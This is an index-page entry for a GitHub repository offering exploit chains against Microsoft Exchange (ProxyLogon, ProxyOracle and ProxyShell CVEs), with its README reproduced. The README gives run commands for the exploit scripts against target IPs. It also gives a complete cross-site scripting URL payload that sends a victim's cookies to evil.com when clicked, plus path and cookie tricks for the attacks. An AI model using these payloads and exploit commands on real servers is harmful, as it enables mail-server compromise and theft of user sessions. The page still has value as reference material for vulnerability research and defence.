Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hosch3n/ProxyVulns
[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.
https://github.com/hosch3n/ProxyVulns
Last synced: 21 days ago
JSON representation
[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.
- Host: GitHub
- URL: https://github.com/hosch3n/ProxyVulns
- Owner: hosch3n
- Created: 2021-04-14T11:12:30.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-10-21T08:59:23.000Z (about 2 years ago)
- Last Synced: 2024-08-05T17:44:40.412Z (4 months ago)
- Language: Python
- Homepage:
- Size: 5.24 MB
- Stars: 174
- Watchers: 4
- Forks: 34
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - hosch3n/ProxyVulns - [ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 (Python)
README
# ProxyVulns
### ProxyLogon
`Usage: python3 26855.py 1.1.1.1`
![](img/26855.png)
### ProxyOracle
``` url
Once a victim clicks this link, evil.com will receive the cookies.https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
`````` bash
pip3 install pycryptodomeUsage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'
```![](img/31196.png)
### ProxyShell
``` bash
pip3 install pypsrpUsage: python3 34473.py 1.1.1.1
Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]
```![](img/34473.png)
![](img/31207.png)
> Not working in some versions target(due to `/@gmail.com` path), maybe fix it later
### Others
- `Cookie: securitytoken=foobar`
- `/owa/calendar/[email protected]/foobar/owa14.aspx/.js`
## Reference
[ProxyLogon Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019
[ProxyOracle Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/23/ProxyOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
https://github.com/mwielgoszewski/python-paddingoracle
[ProxyShell Vulnerability Analysis(Chinese)](https://hosch3n.github.io/2021/08/24/ProxyShell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)